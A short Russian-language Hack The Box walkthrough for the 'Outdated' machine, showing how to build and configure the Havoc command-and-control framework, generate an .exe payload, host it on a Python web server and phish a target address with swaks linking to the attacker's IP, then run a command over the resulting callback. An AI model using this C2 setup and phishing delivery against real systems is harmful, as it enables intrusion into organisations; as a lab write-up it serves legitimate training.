В этой небольшой статье рассмотрим использование фреймворка Havoc при прохождении задания Hack The Box Outdated.
Еще по теме: Прохождение Hack The Box Seal
Использование Havoc для прохождения HTB Outdated
Собрать и клиент, и сервер из исходников очень легко. Сперва установим необходимые пакеты.
1 |
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm |
Теперь скачиваем сам проект и собираем сначала клиент, потом сервер:
1 2 3 4 5 6 7 8 9 10 11 |
git clone https://github.com/HavocFramework/Havoc.git #build client cd Havoc/Client make cd ../.. #build server cd Havoc/Teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go ./Install.sh make |
Теперь внесем изменение в файл:
1 |
Havoc/Teamserver/profiles/havoc.yaotl |
где указываем настройки сервера, а также пользователей для подключения.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
Teamserver { Host = "0.0.0.0" Port = 9898 Build { Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc" Nasm = "/usr/bin/nasm" } } Operators { user "ralf" { Password = "password" } } |
Когда все готово, запускаем клиент как Havoc/Client/Havoc и сервер:
1 |
./teamserver server --profile ./profiles/havoc.yaotl |
Затем создаем HTTPS-листенер и генерируем нагрузку в формате .exe.
В каталоге, где расположена нагрузка, запустим простой веб‑сервер:
1 |
python3 -m http.server 8080 |
Затем отправляем письмо:
1 |
swaks --to itsupport@outdated.htb --from ralf@ralf --server mail.outdated.htb --body "http://10.10.14.24:8000/" |
Машина с багами, поэтому засылать приходилось по нескольку раз, а то и с ревертом самой машины. Но все же отстук получить удалось.
1 |
shell whoami |
В следующей статье продолжим прохождение HTB Outdated и рассмотрим инструмент BloodHound.
ПОЛЕЗНЫЕ ССЫЛКИ: